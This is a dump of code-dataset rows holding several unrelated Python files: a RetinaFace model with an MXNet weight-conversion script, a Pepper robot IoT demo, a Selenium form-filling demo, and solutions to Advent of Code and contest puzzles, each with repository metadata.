            x = self.c2(x)
            x = self.c3(x)
            x = inp + x
        return x, x2
class Stage(M.Model):
    """A ResNet stage: one downsampling/projection Unit followed by
    identity Units. Returns the stage output and the first unit's
    lateral feature (its 1x1 conv activation)."""
    def initialize(self, outchn, num_units, stride):
        # Only the first unit downsamples and carries a projection shortcut.
        units = [
            Unit(outchn, stride=stride if idx == 0 else 1, shortcut=(idx == 0))
            for idx in range(num_units)
        ]
        self.units = nn.ModuleList(units)
    def forward(self, x):
        # The lateral feature comes from the first unit only.
        x, lateral = self.units[0](x)
        for unit in self.units[1:]:
            x, _ = unit(x)
        return x, lateral
class DETHead(M.Model):
    """SSH-style detection head: a direct 3x3 branch plus a two-level
    context module, concatenated along channels and ReLU-activated."""
    def initialize(self):
        self.c11 = M.ConvLayer(3, 256, batch_norm=True)
        self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c22 = M.ConvLayer(3, 128, batch_norm=True)
        self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c32 = M.ConvLayer(3, 128, batch_norm=True)
        self.act = M.Activation(M.PARAM_RELU)
    def forward(self, x):
        direct = self.c11(x)
        context = self.c21(x)
        # Deeper context path reuses the shared context feature.
        deep = self.c32(self.c31(context))
        shallow = self.c22(context)
        merged = torch.cat([direct, shallow, deep], dim=1)
        return self.act(merged)
class RegressHead(M.Model):
    """Per-anchor prediction head: 4 classification scores, 8 bbox
    deltas, and 20 landmark offsets (2 anchors per location)."""
    def initialize(self):
        self.c1 = M.ConvLayer(1, 4)
        self.c2 = M.ConvLayer(1, 8)
        self.c3 = M.ConvLayer(1, 20)
    def forward(self, x):
        bbox = self.c2(x)
        kpts = self.c3(x)
        raw = self.c1(x)
        # Softmax over the 2 classes: fold the anchor axis into height,
        # normalize, then restore the original channel layout.
        batch, _, height, width = raw.shape
        scores = raw.view(batch, 2, height * 2, width)
        scores = F.softmax(scores, dim=1)
        scores = scores.view(batch, 4, -1, width)
        return scores, bbox, kpts
class Detector(M.Model):
    """RetinaFace-style detector with a ResNet-50 backbone.

    Emits (scores, bboxes, landmarks) at strides 32, 16 and 8, with
    FPN-style top-down fusion between the three levels.
    """
    def initialize(self):
        # Backbone (pre-activation ResNet-50).
        self.bn0 = M.BatchNorm()
        self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.pool = M.MaxPool2D(3, 2)
        self.stage1 = Stage(64, num_units=3, stride=1)
        self.stage2 = Stage(128, num_units=4, stride=2)
        self.stage3 = Stage(256, num_units=6, stride=2)
        self.stage4 = Stage(512, num_units=3, stride=2)
        self.bn1 = M.BatchNorm()
        self.act = M.Activation(M.PARAM_RELU)
        # Stride-32 branch.
        self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det3 = DETHead()
        self.head32 = RegressHead()
        # Stride-16 branch (fuses upsampled stride-32 features).
        self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.ssh_c3_upsampling = M.NNUpSample(2)
        self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det2 = DETHead()
        self.head16 = RegressHead()
        # Stride-8 branch (fuses upsampled stride-16 features).
        self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.ssh_c2_upsampling = M.NNUpSample(2)
        self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
        self.det1 = DETHead()
        self.head8 = RegressHead()
    def forward(self, x):
        # Backbone forward; f1/f2 are lateral features from stages 3/4.
        x = self.bn0(x)
        x = self.c1(x)
        x = self.pool(x)
        x, _ = self.stage1(x)
        x, _ = self.stage2(x)
        x, f1 = self.stage3(x)   # lateral input for the stride-8 branch
        x, f2 = self.stage4(x)   # lateral input for the stride-16 branch
        x = self.bn1(x)
        x = self.act(x)
        # Stride-32 predictions.
        fc3 = x = self.ssh_c3_lateral(x)
        d3 = x = self.det3(x)
        scr32, box32, lmk32 = self.head32(d3)
        # Stride-16: upsample stride-32 features, crop to the lateral's
        # spatial size, add, aggregate, predict.
        fc2 = self.ssh_c2_lateral(f2)
        x = self.ssh_c3_upsampling(fc3)
        x = x[:,:,:fc2.shape[2],:fc2.shape[3]]
        plus100 = x = fc2 + x  # NOTE(review): plus100 is never used
        fc2_aggr = x = self.ssh_c2_aggr(x)
        d2 = x = self.det2(x)
        scr16, box16, lmk16 = self.head16(d2)
        # Stride-8: same fusion pattern one level down.
        fc1 = self.ssh_m1_red_conv(f1)
        x = self.ssh_c2_upsampling(fc2_aggr)
        x = x[:,:,:fc1.shape[2],:fc1.shape[3]]
        x = fc1 + x
        fc1_aggr = x = self.ssh_c1_aggr(x)
        d1 = x = self.det1(x)
        scr8, box8, lmk8 = self.head8(d1)
        results = [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
        return results
if __name__=='__main__':
    # Build the torch model and run one dummy forward pass so every
    # parameter/buffer exists before weights are copied in.
    net = Detector()
    net.eval()
    x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
    _ = net(x)
    # net.bn_eps(1e-5)
    # net.backbone.det1.bn_eps(2e-5)
    # Index every torch parameter and buffer by its dotted name.
    res = {}
    ps = net.named_parameters()
    for p in ps:
        name, p = p
        res[name] = p
    ps = net.named_buffers()
    for p in ps:
        name, p = p
        res[name] = p
    # The helpers below build parallel name lists: `a` holds torch
    # parameter names, `b` holds the matching MXNet parameter names.
    def get_bn(l1, l2):
        # BatchNorm: gamma/beta + running statistics.
        a = []
        b = []
        a.append(l1+'.weight')
        a.append(l1+'.bias')
        a.append(l1+'.running_mean')
        a.append(l1+'.running_var')
        b.append(l2+'_gamma')
        b.append(l2+'_beta')
        b.append(l2+'_moving_mean')
        b.append(l2+'_moving_var')
        return a, b
    def get_conv(l1, l2, bias=False):
        # Convolution weight (and optional bias).
        a = [l1 + '.weight']
        b = [l2 + '_weight']
        if bias:
            a.append(l1+'.bias')
            b.append(l2+'_bias')
        return a,b
    def get_layer(l1, l2, bias=False):
        # NOTE(review): appears unused in this script.
        res = []
        res.append(get_conv(l1 + '.conv', l2%('conv')))
        res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
        return res
    def get_convbn(l1, l2, bias=False):
        # Conv followed by its BatchNorm.
        res = []
        res.append(get_conv(l1 + '.conv', l2, bias=bias))
        res.append(get_bn(l1 + '.bn', l2 + '_bn'))
        return res
    def get_unit(l1, l2, sc=False):
        # One bottleneck unit; `sc` adds the projection shortcut conv.
        res = []
        res.append(get_bn(l1+'.bn0', l2+'_bn1'))
        res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
        res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
        res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
        res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
        res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
        if sc:
            res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
        return res
    def get_stage(l1, l2, blocknum):
        # A full stage; only the first unit has a shortcut conv.
        res = []
        for i in range(blocknum):
            res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
        return res
    def get_dethead(l1, l2):
        # SSH detection head: direct branch + context module convs.
        res = []
        res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
        res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
        res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
        res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
        res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
        return res
    def get_regress(l1, l2):
        # Per-stride score / bbox / landmark 1x1 convs.
        res = []
        res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
        res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
        res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
        return res
    def totonoi(l):
        # Flatten [(a_names, b_names), ...] into two flat parallel lists.
        # print(l)
        a = []
        b = []
        for i in l:
            a += i[0]
            b += i[1]
        return a,b
    # Assemble the full torch<->mxnet name mapping for the whole network.
    l = []
    l.append(get_bn('bn0', 'bn_data'))
    l.append(get_conv('c1.conv', 'conv0'))
    l.append(get_bn('c1.bn', 'bn0'))
    l += get_stage('stage1', 'stage1', 3)
    l += get_stage('stage2', 'stage2', 4)
    l += get_stage('stage3', 'stage3', 6)
    l += get_stage('stage4', 'stage4', 3)
    l.append(get_bn('bn1', 'bn1'))
    l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
    l += get_dethead('det3', 'ssh_m3_det')
    l += get_regress('head32', 'face_rpn_%s_stride32')
    l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
    l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
    l += get_dethead('det2', 'ssh_m2_det')
    l += get_regress('head16', 'face_rpn_%s_stride16')
    l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
    l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
    l += get_dethead('det1', 'ssh_m1_det')
    l += get_regress('head8', 'face_rpn_%s_stride8')
    a,b = totonoi(l)
    # print(a,b)
    # `source` is a local module that presumably exposes the MXNet
    # weights as `source.res` (name -> NDArray) — confirm.
    import source
    for i,j in zip(a,b):
        # print(i,j)
        value = source.res[j].asnumpy()
        # print(value.shape)
        # print(res[i].shape)
        res[i].data[:] = torch.from_numpy(value)[:]
    # net.bn_eps(2e-5)
    # Sanity-check the converted model, then save it.
    y = net(x)
    print(y[0])
    print(y[0].shape)
    M.Saver(net).save('./model_r50/r50_retina.pth')
| [
"cy960823@outlook.com"
] | cy960823@outlook.com |
d5e603260c7090d7a8d90aa950916b167e7fe620 | 3f1bc9c7d58f89fcc61b44e1e8197a5df18e3dbc | /src/light_demo.py | 439753943ad251e822817883a28e8ddb6e3a3161 | [] | no_license | kynamg/hello | 4a382f2eb2fbf8847cb5df13fab4a8b90fcf9868 | 92b8059fb5f05b20abfcccc54dc4e47d3d9b6ef2 | refs/heads/master | 2021-08-22T23:03:21.314150 | 2017-12-01T15:16:41 | 2017-12-01T15:16:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py | #!/usr/bin/env python
# Title : light_demo.py
# Author : Kyna Mowat-Gosnell
# Date : 09/10/17
# Version : 2.0
import rospy, qi, argparse
import sys
import time
import naoqi
from naoqi import *
from diagnostic_msgs.msg import KeyValue # message type /iot_updates uses
from std_msgs.msg import Empty
def callback(data):
    """Generic subscriber callback used only to trace that it fired."""
    message = "inside callback"
    print(message)
def iot_callback(data):
    """Handle /iot_command KeyValue messages: ring when the toggle turns ON."""
    button_pressed = (data.key == " Hue_iris_toggle_2") and (data.value == "ON")
    if button_pressed:
        intcm_ring()
def intcm_ring():
    """Announce via TTS and briefly show an image on Pepper's tablet.

    Uses the module-level ``ttsProxy`` / ``tabletProxy`` created in the
    ``__main__`` block.
    """
    ttsProxy.say("Turning on the light")
    #animatedProxy.say("There is someone at the door")
    #tabletProxy.showWebview("http://192.168.1.121/apps/webview-6b6450/index.html")
    #tabletProxy.showWebview("http://192.168.1.99/mjpg/video.mjpg")
    tabletProxy.showWebview("https://www.thdstatic.com/spin/59/205316159/205316159_S01.spin?thumb&profile=400")
    time.sleep(5)  # keep the image on screen for 5 seconds
    tabletProxy.hideWebview()
def listener():
    """Subscribe to /iot_command and block until the ROS node shuts down."""
    rospy.init_node('listener', anonymous=True)  # initialise node to subscribe to topic
    rospy.Subscriber("/iot_command", KeyValue, iot_callback)
    rospy.spin()  # keeps python from exiting until node is stopped
if __name__ == '__main__':
    # NOTE(review): the `print proxy` statement below makes this file
    # Python 2 only.
    from naoqi import ALProxy
    # Create a local broker, connected to the remote naoqi
    broker = ALBroker("pythonBroker", "192.168.1.129", 9999, "pepper.local", 9559)
    #animatedProxy = ALProxy("ALAnimatedSpeech", "pepper.local", 9559) # initialise animated speech proxy
    ttsProxy = ALProxy("ALTextToSpeech", "pepper.local", 9559)
    tabletProxy = ALProxy("ALTabletService", "pepper.local", 9559)
    tabletProxy.getWifiStatus() # check wifi status
    print tabletProxy.getWifiStatus() # print wifi status "CONNECTED" if connected
    postureProxy = ALProxy("ALRobotPosture", "pepper.local", 9559) # initialise posture proxy
    postureProxy.goToPosture("StandInit", 0.5) # return to initial position
    # Spin forever; listener() blocks inside rospy.spin() until shutdown.
    while True:
        listener()
| [
"hwlivinglab@gmail.com"
] | hwlivinglab@gmail.com |
46bd95d09f6bc8aecede6db2b326fc90533f3af9 | 45467e07e77131f631d0865046dcc4d18f483601 | /src/Hackerearth/round_2/A.py | a766bae20c7b6478ffb22d212ff53cd5256fddb7 | [] | no_license | bvsbrk/Algos | 98374e094bd3811579276d25a82bbf2c0f046d96 | cbb18bce92054d57c0e825069ef7f2120a9cc622 | refs/heads/master | 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | if __name__ == '__main__':
for _ in range(int(input().strip())):
n = int(input().strip())
x = n
arr = [int(i) for i in input().strip().split()]
arr = arr[::-1]
i = 0
while arr[i] == 0 and i < n:
i += 1
x -= 1
if i == n - 1:
print(0)
else:
ans = []
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
# neg sgn
if n % 2 == 0:
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
else:
if arr[i] < 0:
ans.append(1)
else:
ans.append(-1)
print(*ans)
| [
"v.ramakoteswararao2015@vit.ac.in"
] | v.ramakoteswararao2015@vit.ac.in |
42c458f3d032a3537cacc143e6752b2e931af068 | a2783f4380503c68db31506243f7c3021c9752f9 | /consulta_estados_brasileiros.py | 0dff039ac70b463a576fce01d1344f2c4f05f1c0 | [] | no_license | jpablolima/python | 2f541378ed3b9fb582c9b1fe8a14ec80891241be | 8e67d723e9649c557786583b257bbde9b899ea37 | refs/heads/master | 2020-06-24T17:51:23.908809 | 2019-11-21T13:41:09 | 2019-11-21T13:41:09 | 199,036,691 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import sqlite3
conexao = sqlite3.connect("brasil.db")
conexao.row_factory = sqlite3.Row
print("%3s %-20s %12s" % ("Id", "Estado", "População"))
print("="*37)
for estado in conexao.execute("select * from estados order by nome"):
print("%3d %-20s %12d" %
(estado["id"],
estado["nome"],
estado["populacao"]))
conexao.close | [
"jp.pablolima@gmail.com"
] | jp.pablolima@gmail.com |
a76f90ee511fdec16e0583ce58592537635c4b8f | 9bbe37776a81954085d21b1b80248ca05094a8ff | /day08/day0801/demo02_v2.py | 7ca9113815f3d292b54a150907dc54a298bf092b | [] | no_license | wxsel/myseleniumproject | e8fd68384055aa696b76e69c49ac6a1df8c0e05f | 98d1c50d9ab133aa1e0801ec2825f986902602d8 | refs/heads/master | 2020-08-08T00:53:45.200465 | 2019-10-08T13:28:06 | 2019-10-08T13:28:06 | 213,648,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | #!/usr/bin/env python3
# coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
from time import sleep
driver=webdriver.Chrome()
# 打开浏览器
def open(url):  # NOTE(review): shadows the builtin open(); consider renaming
    """Navigate the shared WebDriver to *url*."""
    base_url=url
    driver.get(base_url)
base_url=""  # NOTE(review): appears to be dead code — nothing reads this; confirm before removing
# 操作页面元素mycase1
def mycase1():
    """Fill in every field of the demo registration form and submit it."""
    # Username and password.
    name=driver.find_element(By.XPATH,"//input[@name='username']")
    name.send_keys("张晓明")
    password = driver.find_element(By.XPATH, "//input[@name='password']")
    password.send_keys("123456")
    # Gender radio button.
    male = driver.find_element(By.XPATH, "//input[@name='sex']")
    male.click()
    email = driver.find_element(By.XPATH, "//input[@name='email']")
    email.send_keys('xiaoming@126.com')
    # Profession dropdown.
    profession = driver.find_element(By.XPATH, "//select[@name='profession']")
    p1 = Select(profession)
    p1.select_by_visible_text("法律相关")
    # Hobby checkboxes: tick only when not already selected.
    film = driver.find_element(By.XPATH, "//input[@name='film']")
    if film.is_selected() == False:
        film.click()
    painting = driver.find_element(By.XPATH, "//input[@name='painting']")
    if painting.is_selected() == False:
        painting.click()
    # Free-text comments.
    comments = driver.find_element(By.XPATH, "//textarea")
    comments.send_keys("软件测试工程师")
    sleep(1)  # brief pause before submitting
    submit = driver.find_element(By.XPATH, "//input[@name='submit']")
    submit.click()
# 关闭浏览器
def bye_bye():
    """Close all browser windows and end the WebDriver session."""
    driver.quit()
if __name__ == '__main__':
    # Entry point: open the form page, fill it in, close the browser.
    # 打开页面
    my_url=""  # NOTE(review): empty URL — driver.get("") will fail; set the real form URL
    open(my_url)
    mycase1()
    bye_bye()
"hoou1993"
] | hoou1993 |
6ce151591e20779df71ce25110bc3831ce51c59a | b792f600ed4e50f34e65e4f334cf7a32d319cc0e | /2017/day11.py | cf2d1b7780f769b1e96bacb18b46b9ecb825122d | [] | no_license | daniel70/AoC | d577f490559d4a0f0d24567bd796117e1aac94ec | ef704a4f6e90168cdc2a91e894583a96e9a6c371 | refs/heads/master | 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | directions = {
'n': (0, 1),
'ne': (1, 0.5),
'se': (1, -0.5),
's': (0, -1),
'sw': (-1, -0.5),
'nw': (-1, 0.5),
}
def distance(instructions: list[str]) -> tuple[int, int]:
origin = [0, 0]
furthest = 0
for direction in instructions:
dx, dy = directions[direction]
origin[0] += dx
origin[1] += dy
x, y = origin
furthest = max(furthest, abs(x) + max(int(abs(y)) - abs(x) // 2, 0))
steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
return steps, furthest
# NOTE(review): the file handle from open() is never closed; acceptable
# for a one-shot script, but pathlib.Path.read_text() would be tidier.
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
| [
"vdmeulen.daniel@gmail.com"
] | vdmeulen.daniel@gmail.com |
63189884e723d6a31b370e37804c9082c206e005 | 023a5279d1c6f02f4a6952b2538d7bc046d02fc9 | /staffs/admin.py | 7748da2f180d330938614c580a230641754ca2b4 | [] | no_license | mandal143/staff | af24767e9126e5af6aa0c1d36a62f37d93b281be | 6f52ece9ea5eacf24289bea11773d36ec8b69906 | refs/heads/master | 2023-08-10T16:07:10.775517 | 2020-07-03T14:02:10 | 2020-07-03T14:02:10 | 276,841,994 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.contrib import admin
from .models import Employees, LoginLogoutLog
admin.site.register(Employees)
admin.site.register(LoginLogoutLog) | [
"49410374+mandal143@users.noreply.github.com"
] | 49410374+mandal143@users.noreply.github.com |
7441c8779392e406177ecd3e8cb518398c54c8f9 | 14eea746af39f11e6a63306b4f6f0201cf8c2a4d | /adventofcode/day7.py | 0d3a8ebce21725bbb4a53c9066f8654e9ded4d0f | [] | no_license | andrehsu/Advent-of-Code-2019-Python | ce6985ff4f5b329dda5bc6f148dc42ae51160c78 | 5363d4eb9e6c7baf6f8c2a47807fc7e1449fce7f | refs/heads/master | 2022-07-05T05:05:06.476339 | 2020-09-18T08:30:24 | 2020-09-18T08:30:24 | 226,030,389 | 0 | 0 | null | 2022-06-22T03:38:16 | 2019-12-05T06:18:09 | Python | UTF-8 | Python | false | false | 3,965 | py | from itertools import permutations
from typing import Optional, Tuple
from utils import read_input
INPUT = read_input('day7')  # puzzle input; presumably the comma-separated Intcode program text — confirm against utils.read_input
def parse_instruction(instruction: int) -> Tuple[int, int, int, int]:
    """Split an Intcode instruction into (opcode, mode1, mode2, mode3).

    The two low decimal digits are the opcode; each higher digit is the
    parameter mode (0 = position, 1 = immediate) for one parameter.
    Fix: removed the no-op ``// 1`` and simplified the digit extraction.
    """
    opcode = instruction % 100
    mode1 = instruction // 100 % 10
    mode2 = instruction // 1000 % 10
    mode3 = instruction // 10000 % 10
    return opcode, mode1, mode2, mode3
class Amplifier:
    """A resumable Intcode interpreter for one amplifier stage.

    ``run`` executes until the program emits an output (returned as an
    int) or halts (returns None). The instruction pointer, memory and
    pending-input queue persist between calls, so the amplifier can
    participate in a feedback loop.
    """
    def __init__(self, code: str, phase_setting: int):
        self.i = 0  # instruction pointer
        self.mem = list(map(int, code.split(',')))
        self.inputs = [phase_setting]  # input queue; the phase is consumed first
    def run(self, input_signal: int) -> Optional[int]:
        """Queue one input signal, then run until the next output or halt."""
        self.inputs.append(input_signal)
        def param(num: int) -> int:
            # Raw value of the num-th parameter of the current instruction.
            return self.mem[self.i + num]
        def param_value(param_num: int) -> int:
            # Parameter resolved by its mode: 0 = position, 1 = immediate.
            p = param(param_num)
            mode = modes[param_num - 1]
            if mode == 0:
                return self.mem[p]
            elif mode == 1:
                return p
            else:
                raise RuntimeError('Unrecognized mode')
        while True:
            opcode, *modes = parse_instruction(self.mem[self.i])
            if opcode == 1:  # add
                self.mem[param(3)] = param_value(1) + param_value(2)
                assert modes[2] == 0
                self.i += 4
            elif opcode == 2:  # multiply
                self.mem[param(3)] = param_value(1) * param_value(2)
                assert modes[2] == 0
                self.i += 4
            elif opcode == 3:  # read input
                self.mem[param(1)] = self.inputs.pop(0)
                assert modes[0] == 0
                self.i += 2
            elif opcode == 4:  # write output: pause and return it
                ret_val = param_value(1)
                self.i += 2
                return ret_val
            elif opcode == 5:  # jump-if-true
                if param_value(1) != 0:
                    self.i = param_value(2)
                else:
                    self.i += 3
            elif opcode == 6:  # jump-if-false
                if param_value(1) == 0:
                    self.i = param_value(2)
                else:
                    self.i += 3
            elif opcode == 7:  # less-than
                if param_value(1) < param_value(2):
                    self.mem[param(3)] = 1
                else:
                    self.mem[param(3)] = 0
                self.i += 4
            elif opcode == 8:  # equals
                if param_value(1) == param_value(2):
                    self.mem[param(3)] = 1
                else:
                    self.mem[param(3)] = 0
                self.i += 4
            elif opcode == 99:  # halt
                return None
            else:
                raise RuntimeError(f"Unexpected opcode: {opcode}")
def day7(input_: str) -> None:
    """Run and print both parts of the day 7 puzzle for *input_*."""
    part1(input_)
    part2(input_)
def part1(input_):
    """Day 7 part 1: chain five amplifiers once per phase permutation
    of 0-4 and print the maximum thruster signal."""
    def thruster_signal(phases):
        # Feed each amplifier the previous amplifier's output.
        signal = 0
        for phase in phases:
            signal = Amplifier(input_, phase).run(signal)
        return signal
    print(max(thruster_signal(p) for p in permutations(range(5))))
def part2(input_):
    """Day 7 part 2: feedback loop with phases 5-9; print the max signal."""
    signals = []
    for a, b, c, d, e in permutations(range(5, 10)):
        amplifiers = {
            'a': Amplifier(input_, a),
            'b': Amplifier(input_, b),
            'c': Amplifier(input_, c),
            'd': Amplifier(input_, d),
            'e': Amplifier(input_, e),
        }
        last_output = 0
        last_loop = False
        # Cycle through the five amplifiers, feeding each the previous
        # output, until one of them halts (run() returns None).
        while not last_loop:
            for key, amplifier in amplifiers.items():
                output = amplifier.run(last_output)
                if output is None:
                    last_loop = True
                else:
                    last_output = output
        signals.append(last_output)
    print(max(signals))
print(max(signals))
if __name__ == '__main__':
    # Print the answers for both puzzle parts.
    part1(INPUT)
    part2(INPUT)
| [
"4470828+andrehsu@users.noreply.github.com"
] | 4470828+andrehsu@users.noreply.github.com |
cf84b8508c24aa61ea4018468c09b1302f383a08 | cd11a7fafe7d5ac6561ee2b1760d6a75a9df5757 | /bigdata.py | 06b134c5c31858a3744fd1b578cb0e10f5d85976 | [] | no_license | zhongyuanbaike/Python | 217731f99a53f9480cd471e39429e0fafd84f1b2 | ed0aed89539aa87ccdc0fb2108e8df165dc59b6b | refs/heads/master | 2020-04-11T06:21:26.814676 | 2019-03-13T06:44:14 | 2019-03-13T06:44:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | import pandas as pd
reader = pd.read_csv('F:\\world.txt',iterator=True,error_bad_lines=False)
chunk = reader.get_chunk(50000000)
df=pd.DataFrame(chunk)
df.dropna()
df.columns = ['date', 'b', 'c', 'd']
df['date'] = pd.to_datetime(df['date']) #将数据类型转换为日期类型
df = df.set_index('date') # 将date设置为index
i=24
num_1=str(i)
num_2=str(i+1)
df = df['2016-01-'+num_1+' 21:00:00':'2016-01-'+num_2+' 00:00:00']
print(df)
df_1 = df[df.b >= 31.15]
df_2 = df_1[df_1.b <= 32.7]
df_3 = df_2[df_2.c >= 118.23]
df_4 = df_3[df_3.c <= 119.3]
# df_4.to_csv('F:\\timedata\\1.txt',index = False)
df_4 = df.groupby(['b', 'c']).sum()
df_4.to_csv('F:\\timedata\\1.txt',encoding = 'utf-8')
| [
"noreply@github.com"
] | zhongyuanbaike.noreply@github.com |
5432391a83b8c960663d3cef2f2aa55994ff307a | c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56 | /crescent/functions/get_att.py | 704a83a8c9e664be800a85836e5778252c98e7a2 | [
"Apache-2.0"
] | permissive | mpolatcan/crescent | 405936ec001002e88a8f62d73b0dc193bcd83010 | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | refs/heads/master | 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
    """Builder for the CloudFormation ``Fn::GetAtt`` intrinsic function.

    The field order passed to the base class presumably fixes the array
    ordering as ``[<Resource>, <Attribute>]`` in the rendered template.
    """
    def __init__(self):
        super(GetAtt, self).__init__(
            fn_name=GetAtt.__name__,
            field_order=[self.Resource.__name__, self.Attribute.__name__]
        )
    def Resource(self, resource_id: Union[str, AnyFn]):
        # Logical ID of the resource whose attribute is fetched.
        return self._set_field(self.Resource.__name__, resource_id)
    def Attribute(self, attribute: Union[str, AnyFn]):
        # Name of the attribute to fetch from the resource.
        return self._set_field(self.Attribute.__name__, attribute)
| [
"mutlupolatcan@gmail.com"
] | mutlupolatcan@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.